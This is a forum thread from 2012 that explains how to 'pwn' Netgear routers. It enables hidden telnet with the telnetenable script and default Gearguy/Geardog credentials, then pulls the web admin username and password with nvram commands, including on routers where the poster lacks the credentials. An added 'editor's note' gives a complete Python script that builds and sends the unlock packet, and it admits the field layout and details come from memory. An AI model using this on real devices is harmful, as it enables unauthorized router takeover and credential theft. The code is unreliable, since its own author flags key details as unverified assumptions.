Howto Pwn Netgear Routers via Telnet

Discussion in 'eBooks, PDFs, Videos & MP3s' started by scorpius, 16 Sep 2012.

  1. scorpius

    scorpius Well-Known Member

    Joined:
    12 Jul 2012
    Messages:
    32
    Likes Received:
    22
    One can access a Netgear router's configuration page with a browser and the default admin-password login combination. When this information is not available, the router can be reset with a paperclip, but all settings will be lost, and you risk being detected. A better solution is to use telnet.

    Most Netgear routers have the telnet service up and running. Even though it is disabled by default, it can be remotely enabled as long as you are connected to the AP. Download the Python script and execute it as follows, making sure to substitute the router's local IP address, and to enter the router's MAC address in all capital letters:

    python telnetenable.py 192.168.1.1 MACADDRESS Gearguy Geardog

    Now you can telnet into the router (with this command: telnet 192.168.1.1) and do all kinds of neat things. Below is the output for a WNR1000v3. As you can see, the router is running busybox. The routerinfo command gives a quick overview and also displays the WPS pin. Not all models have the routerinfo command. In that case, press tab to see a list of installed commands, or type busybox.

    The nvram command allows you to access (and perhaps change) all the settings that are stored in the device's non-volatile memory. Some models use config instead of nvram, but it does the same thing. In order to fully pwn a router for which you do not have the login credentials, you can use the nvram get http_* commands as shown below. That's how you can quickly get the name and password for the web interface.

    Code:
    Trying 192.168.1.1...
    Connected to 192.168.1.1.
    Escape character is '^]'.

    BusyBox v0.60.0 (2010.12.01-12:13+0000) Built-in shell (msh)
    Enter 'help' for a list of built-in commands.

    # routerinfo
    Release version : Netgear Wireless Router WNR1000v3 U12H13900/V1.0.2.28/52.0.60NA
    Time : Dec 1 2010 20:19:46
    CFE version : 3.0.6
    WSC PIN - XXXXXXXX
    LAN mac address - 204E7FXXXXXX
    WAN mac address - 204E7FXXXXXX
    WLAN mac address - 204E7FXXXXXX
    Board ID - U12H139T50_NETGEAR
    serial number - XXXXXXXXXXXXX
    # nvram get http_username
    XXXXXXXX
    # nvram get http_passwd
    XXXXXXXX
    The nvram show command shows all variables, including hidden ones that are not available on the web interface. The ls -l command shows you all the files on the router, which is nothing but a small computer. Don't forget to look inside the www directory for hidden pages. Have fun exploring the inner workings of your router.
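
Editor's note, added example (not part of scorpius' post and not the netgear-telnetenable project's own code): the script in the post works by sending a 128-byte "unlock" packet to the router, built from the MAC address, the Gearguy/Geardog credentials, an MD5 signature and a Blowfish pass. The Python below reproduces that packet builder so you can see what actually goes over the wire, and adds a port check to confirm the telnet daemon came up afterwards. Assumptions: the field layout (16/16/16/33 bytes plus zero padding), the key prefix AMBIT_TELNET_ENABLE+, the 32-bit byte swap around the cipher, and TCP/23 (older firmware) versus UDP/23 (newer firmware) are taken from the public reimplementation as remembered here and should be checked against the script you run; pycryptodome supplies Blowfish when installed, and the ecb_encrypt parameter exists only so the wrapper can be exercised without it. The MAC in the usage line is a placeholder, not a real device.

```python
"""Builder for the Netgear "telnetenable" unlock packet (added example).

Packet layout, following the public netgear-telnetenable reimplementation
(from memory; check against the script you actually run, this is an assumption):
  0x00  16 bytes  MD5 of bytes 0x10..0x7F
  0x10  16 bytes  MAC, 12 upper-case hex digits, NUL padded
  0x20  16 bytes  username, NUL padded
  0x30  33 bytes  password, NUL padded
  0x51  47 bytes  zero padding (total 0x80 = 128 bytes)
The block is 32-bit byte-swapped, Blowfish-ECB encrypted with the key
b"AMBIT_TELNET_ENABLE+" + password, then byte-swapped back.
"""
import hashlib
import socket
import struct
import sys

SIG_LEN, MAC_LEN, USER_LEN, PASS_LEN, PAYLOAD_LEN = 0x10, 0x10, 0x10, 0x21, 0x80
KEY_PREFIX = b"AMBIT_TELNET_ENABLE+"  # key prefix used by the public tool (assumption)


def normalise_mac(mac: str) -> str:
    """Accept '20:4e:7f:aa:bb:cc', '20-4E-...' or bare hex; return 12 upper-case hex digits."""
    cleaned = mac.replace(":", "").replace("-", "").upper()
    if len(cleaned) != 12 or any(c not in "0123456789ABCDEF" for c in cleaned):
        raise ValueError("MAC address must be 12 hex digits, got %r" % mac)
    return cleaned


def _field(value: bytes, width: int) -> bytes:
    """NUL-pad a field; refuse values that would overflow or lose their terminator."""
    if len(value) >= width:
        raise ValueError("value %r does not fit a %d-byte field" % (value, width))
    return value.ljust(width, b"\x00")


def build_plaintext(mac: str, username: str, password: str) -> bytes:
    """Signature + MAC + username + password + zero padding: 128 bytes, before encryption."""
    body = (_field(normalise_mac(mac).encode(), MAC_LEN)
            + _field(username.encode(), USER_LEN)
            + _field(password.encode(), PASS_LEN))
    body = body.ljust(PAYLOAD_LEN - SIG_LEN, b"\x00")
    return hashlib.md5(body).digest() + body


def signature_ok(plain: bytes) -> bool:
    """True if the leading MD5 matches the remaining 112 bytes."""
    return (len(plain) == PAYLOAD_LEN
            and plain[:SIG_LEN] == hashlib.md5(plain[SIG_LEN:]).digest())


def byteswap32(data: bytes) -> bytes:
    """Reverse the byte order inside every 32-bit word (length must be a multiple of 4)."""
    n = len(data) // 4
    return struct.pack("<%dI" % n, *struct.unpack(">%dI" % n, data))


def encrypt_payload(plain: bytes, password: str, ecb_encrypt=None) -> bytes:
    """Swap, Blowfish-ECB encrypt, swap back.

    ecb_encrypt lets a caller inject the cipher; when it is None, pycryptodome's
    Blowfish is used (optional dependency, imported lazily)."""
    if ecb_encrypt is None:
        from Crypto.Cipher import Blowfish
        cipher = Blowfish.new(KEY_PREFIX + password.encode(), Blowfish.MODE_ECB)
        ecb_encrypt = cipher.encrypt
    return byteswap32(ecb_encrypt(byteswap32(plain)))


def build_packet(mac: str, username: str = "Gearguy", password: str = "Geardog",
                 ecb_encrypt=None) -> bytes:
    """Full unlock packet for one router, using the well-known Gearguy/Geardog pair."""
    return encrypt_payload(build_plaintext(mac, username, password), password, ecb_encrypt)


def send_packet(host: str, packet: bytes, udp: bool = False, port: int = 23) -> None:
    """Older firmware takes the packet on TCP/23, newer firmware on UDP/23 (assumption)."""
    if udp:
        with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
            s.sendto(packet, (host, port))
    else:
        with socket.create_connection((host, port), timeout=3.0) as s:
            s.sendall(packet)


def telnet_open(host: str, port: int = 23) -> bool:
    """Check whether the telnet daemon is accepting connections after the unlock."""
    try:
        with socket.create_connection((host, port), timeout=3.0):
            return True
    except OSError:
        return False


if __name__ == "__main__":
    # usage: python telnetenable_example.py 192.168.1.1 204E7FXXXXXX [udp]
    host, mac = sys.argv[1], sys.argv[2]
    send_packet(host, build_packet(mac), udp=len(sys.argv) > 3 and sys.argv[3] == "udp")
    print("telnet open:", telnet_open(host))
```

If the port check stays closed after a TCP send, retry with the udp argument before assuming the firmware is patched; the two listeners were never available on the same release.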
     
  2. Inkwizytor666

    Inkwizytor666 Member

    Joined:
    27 Jan 2013
    Messages:
    1
    Likes Received:
    0
    Where can I download this Python file?
     
  3. scorpius

    scorpius Well-Known Member

    Joined:
    12 Jul 2012
    Messages:
    32
    Likes Received:
    22
    It comes with BackTrack, and also at: code.google.com/p/netgear-telnetenable/
     